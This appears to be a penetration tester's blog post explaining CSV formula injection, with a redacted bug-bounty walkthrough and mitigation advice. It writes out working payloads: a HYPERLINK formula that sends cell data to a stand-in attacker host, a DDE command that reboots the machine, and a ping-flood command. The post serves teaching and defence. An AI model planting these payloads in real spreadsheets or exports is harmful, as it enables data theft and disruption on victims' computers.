CSV (Formula) Injection
Hello friends!
This is my 14th blog on web application security penetration testing. In this blog I will explain CSV Injection. In my last blog, I have explained Cross Origin Resource Sharing. If you haven’t read it yet please follow along and subscribed to my blogs on medium.
So let’s not waste more time to jump into the topic.
What is CSV Injection?
CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.
When a spreadsheet program such as Microsoft Excel or LibreOffice is used to open a CSV, any cells starting with = will be interpreted by the software as a formula.
Where to be tested for CSV Injection?
- File Upload Functionalities
2. File Download Functionalities
3. Export File/Data in CSV Format Options, etc.
Below is the step by step POC for CSV Injection which I have tested on one private program. To maintain confidentiality agreement let’s hide the original domain and mask it with redacted.com
- I have logged into redacted.com and navigated to File Upload Functionality where I was allowed to upload PDF or XLS Files.
2. Click on Upload button new page will appear where you can create new template. Notice you can upload xls/xlsx files using Upload button.
3. Once file upload successful, you can download it from download history or simply click on Edit template page as shown below:
4. Once downloaded file opened by user, some warnings will prompt by Excel which will prevent user to open file by displaying some security warnings. Say Update and Yes to all warnings and open the file.
5. Click on Yes.
6. It will open file and executes formula injected in file. Here I have demonstrated with simple calculator command. Notice calculator gets opened when user opened file.
Impact:
Maliciously crafted formulas can be used for three key attacks:
1] Hijacking the user’s computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014–3524
2] Hijacking the user’s computer by exploiting the user’s tendency to ignore security warnings in spreadsheets that they downloaded from their own website
3] Exfiltrating contents from the spreadsheet, or other open spreadsheets.
And just like that, the attacker has free reign to download a keylogger, install things, and overall remotely execute code not merely on any other person’s computer, but on that of someone guaranteed to have access to all user’s data; for example, a manager or a company administrator.
Note: We are just demonstrating with calculator but in real time attacker can take the advantage of this vulnerability to shutdown server or ping server by executing OS command or attacker can exploit it on higher level, for example importing files from server controlled by attacker. Following formula embed Hyperlink More Here in excel file and when user click on link information within selected cell send to attackers’ domain.
=HYPERLINK(“http://172.0.0.1:8000?leads="&A2&B2, “More here”)
Attacker can inject following command which will shut down victim’s server immediately and if victim would have some unsaved data then he/she will be lost data.
=cmd | ‘ /C shutdown /r ‘ ! ‘ A1 ‘
Attacker can ping server and flood server with so many ping requests do perform DOS attack.
=cmd|’/C ping -t 172.0.0.1 -l 25152'!’A1'
Recommendation:
In excel workbook, any cell that start with =, -, +, or @ will be considered as formula. So, for any cell that begins with one of the formulae triggering characters =, -, +, or @, you should directly prefix it with a tab, apostrophe, or space character. Note that if there are quotes, this character goes inside of the quotes.
This attack is difficult to mitigate, and explicitly disallowed from quite a few bug bounty programs. To remediate it, ensure that no cells begin with any of the following characters:
- Equals to (
=) - Plus (
+) - Minus (
-) - At (
@) - Tab (
0x09) - Carriage return (
0x0D)
References:
https://www.contextis.com/en/blog/comma-separated-vulnerabilities
Comma Separated Vulnerabilities
Video showing CSV Injection against Piwik
Stealing Google Docs via CSV Injection
Please do like and follow for more reads!
Thanks Readers!
